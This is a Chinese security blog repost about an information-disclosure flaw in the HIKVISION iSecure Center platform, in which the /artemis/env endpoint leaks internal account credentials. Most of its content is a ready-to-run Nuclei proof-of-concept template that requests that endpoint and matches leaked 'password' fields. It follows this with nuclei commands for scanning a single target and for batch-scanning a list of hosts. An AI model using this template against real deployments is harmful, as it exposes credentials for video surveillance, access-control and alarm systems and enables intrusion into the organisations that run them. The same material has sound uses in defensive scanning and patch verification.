HiKVISION 综合安防管理平台 env 信息泄漏漏洞

admin 2023年11月28日14:59:03评论98 views字数 1444阅读4分48秒阅读模式

HiKVISION 综合安防管理平台 env 信息泄漏漏洞

漏洞来源

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视综合安防管理平台信息存在信息泄露(内网集权账户密码)漏洞,可以通过解密软件,解密用户名密码。

HiKVISION 综合安防管理平台 env 信息泄漏漏洞
#参考网址:https://github.com/ibaiw/2023Hvv/blob/main/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20env%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md

✨Nuclei POC漏洞验证

id: template-id
info:  name: Template Name  author: pro  severity: info  description: description  reference:    - https://  tags: tags
http:  - raw:      - |+        GET /artemis/env HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/jxl,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Upgrade-Insecure-Requests: 1        Sec-Fetch-Dest: document        Sec-Fetch-Mode: navigate        Sec-Fetch-Site: none        Sec-Fetch-User: ?1        Sec-Ch-Ua-Platform: "Windows"        Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24"        Sec-Ch-Ua-Mobile: ?0        Te: trailers        Connection: close    matchers:      - type: word        words:          - "password"          - "bic"        condition: and      - type: status        status:          - 200

✨ 使用Nuclei批量漏洞检测

HiKVISION 综合安防管理平台 env 信息泄漏漏洞
#pocsuite使用#单个目标检测nuclei -t haikang.yaml -u https://xxx#批量检测nuclei -l mb.txt -t haikang.yaml

HiKVISION 综合安防管理平台 env 信息泄漏漏洞




原文始发于微信公众号(echoabced):HiKVISION 综合安防管理平台 env 信息泄漏漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月28日14:59:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HiKVISION 综合安防管理平台 env 信息泄漏漏洞https://cn-sec.com/archives/2243689.html

发表评论

匿名网友 填写信息